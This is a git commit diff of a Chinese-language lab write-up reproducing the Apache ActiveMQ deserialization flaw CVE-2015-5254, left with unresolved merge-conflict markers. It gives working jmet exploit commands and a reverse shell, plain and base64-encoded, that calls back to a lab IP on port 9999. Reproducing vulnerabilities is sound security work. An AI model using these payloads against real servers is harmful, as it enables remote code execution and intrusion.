Web服务器漏洞/Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md

2025-11-06 11:27:43 +00:00 · 2022-02-21 13:49:00 +08:00 · 2022-02-21 13:49:00 +08:00 · da56ed044b
commit da56ed044b
parent 65c6df9418 a0c04df852
1 changed files with 34 additions and 0 deletions
--- a/Web服务器漏洞/Apache
+++ b/Web服务器漏洞/Apache
@ -51,11 +51,19 @@ sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/java-8-openjd
 sudo update-alternatives --config java
 ```

+<<<<<<< HEAD
 ![image-20220221132209838](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347981.png)

 再次查看java版本，切换成功

 ![image-20220221132246597](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347982.png)
+=======
+![image-20220221132209838](../../../Markdown/images/202202211324903-16454223573971.png)
+
+再次查看java版本，切换成功
+
+![image-20220221132246597](../../../Markdown/images/202202211324904-16454223573973.png)
+>>>>>>> a0c04df852848f5cd26efb3aeb78ae9780805765

 ### 漏洞复现

@ -72,6 +80,7 @@ mkdir external
 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/awesome_poc" -Yp ROME 192.168.174.128 61616
 ```

+<<<<<<< HEAD
 ![image-20220221133654012](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347983.png)

 访问 http://192.168.174.128:8161/admin/browse.jsp?JMSDestination=event 可以看到多了一条消息队列，ID为kali-38087-1645421794512-1:1:1:1:1
@ -83,6 +92,19 @@ java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/awesome_poc"
 ![image-20220221133952983](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347985.png)

 ![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347986.png)也可以创建一个反弹shell的payload
+=======
+![image-20220221133654012](../../../Markdown/images/202202211345369-16454223573975.png)
+
+访问 http://192.168.174.128:8161/admin/browse.jsp?JMSDestination=event 可以看到多了一条消息队列，ID为kali-38087-1645421794512-1:1:1:1:1
+
+![image-20220221133733242](../../../Markdown/images/202202211345370-16454223573977.png)
+
+点击这个信息触发文件创建，成功执行命令 touch /tmp/awesome_poc
+
+![image-20220221133952983](../../../Markdown/images/202202211345371-16454223573979.png)
+
+![2](../../../Markdown/images/202202211324906-164542235739711.png)也可以创建一个反弹shell的payload
+>>>>>>> a0c04df852848f5cd26efb3aeb78ae9780805765

 ```shell
 bash -i >& /dev/tcp/192.168.174.128/9999 0>&1  (base64编码)
@ -94,6 +116,7 @@ bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx}|{bas
 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.174.128 61616
 ```

+<<<<<<< HEAD
 ![image-20220221134243490](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347987.png)

 查看消息队列，ID为kali-38435-1645422155171-1:1:1:1:1
@ -103,4 +126,15 @@ java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAta
 监听9999端口，点击消息队列会触发命令执行，反弹Shell

 ![image-20220221134508900](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347989.png)
+=======
+![image-20220221134243490](../../../Markdown/images/202202211345372-164542235739713.png)
+
+查看消息队列，ID为kali-38435-1645422155171-1:1:1:1:1
+
+![image-20220221134313545](../../../Markdown/images/202202211345373-164542235739715.png)
+
+监听9999端口，点击消息队列会触发命令执行，反弹Shell
+
+![image-20220221134508900](../../../Markdown/images/202202211345374-164542235739717.png)
+>>>>>>> a0c04df852848f5cd26efb3aeb78ae9780805765